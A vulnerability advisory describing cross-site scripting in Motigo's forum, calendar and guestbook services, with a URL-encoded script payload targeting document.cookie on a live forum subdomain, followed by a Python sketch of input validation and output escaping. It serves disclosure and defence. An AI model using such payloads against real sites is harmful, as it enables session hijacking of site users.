Motigo Forums/Calendar/Guestbook suffers from a cross-site scripting vulnerability.
e074f30cd50bf25af3c1cf5be79c3b508a7b7422b79fe218e263c28eafd599af
# Exploit Title: Motigo Forums/Calendar/Guestbook Cross Site Scripting
# Date: 28.01.2012
# Author: Sony
# Software Link: http://motigo.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/motigo-forumscalendarguestbook-cross.html
..................................................................
Calendar:
Create a calendar and add a new event --> put the XSS code in the Notes field and add the event.
Demo:
http://36317.calendars.motigo.com/day/show/date/2012-01-28
Forums:
The XSS is in the email_send action, in the boarduser_id parameter.
http://94932.forums.motigo.com/?action=email_send&boarduser_id=[our xss is here]
Demo:
http://94932.forums.motigo.com/?action=email_send&boarduser_id=%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
Guestbooks:
Put the XSS code in the Homepage field and press the Submit button.
Demo:
http://234402.guestbooks.motigo.com/?action=index
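
Mitigation sketch for the three injection points above. This is an added example, not part of the original advisory and not Motigo's code; Python stands in because the advisory does not state the server-side language. The function names are hypothetical, and it assumes boarduser_id is a numeric id, Notes is free text shown in the page body, and Homepage is rendered as a link.

```python
import html
from urllib.parse import unquote, urlsplit

# Value of boarduser_id decoded from the Forums demo URL in this advisory.
DEMO_QUERY_VALUE = unquote(
    "%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
    "%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E"
)


def parse_boarduser_id(raw):
    """Forums: boarduser_id is assumed numeric, so accept ASCII digits only."""
    if raw.isascii() and raw.isdigit() and len(raw) <= 10:
        return int(raw)
    return None  # caller should answer 400 and never echo the raw value


def render_note(note):
    """Calendar: Notes is free text, so encode it for the HTML body context."""
    return '<p class="note">' + html.escape(note, quote=True) + "</p>"


def render_homepage_link(url):
    """Guestbook: Homepage becomes a link; allow http(s) only, then encode."""
    url = url.strip()
    try:
        parts = urlsplit(url)
    except ValueError:
        return ""  # malformed URL: render nothing
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return ""  # drops javascript:, data: and scheme-less input
    safe = html.escape(url, quote=True)  # encode for attribute and body
    return '<a rel="nofollow noopener" href="' + safe + '">' + safe + "</a>"


if __name__ == "__main__":
    print(parse_boarduser_id("12345"))           # constructed valid id
    print(parse_boarduser_id(DEMO_QUERY_VALUE))  # rejected
    print(render_note(DEMO_QUERY_VALUE))         # shown as inert text
    print(render_homepage_link("http://example.com/"))
```

Validation by type covers the reflected parameter; the two stored fields need encoding at output time, because the stored value may predate any input filter.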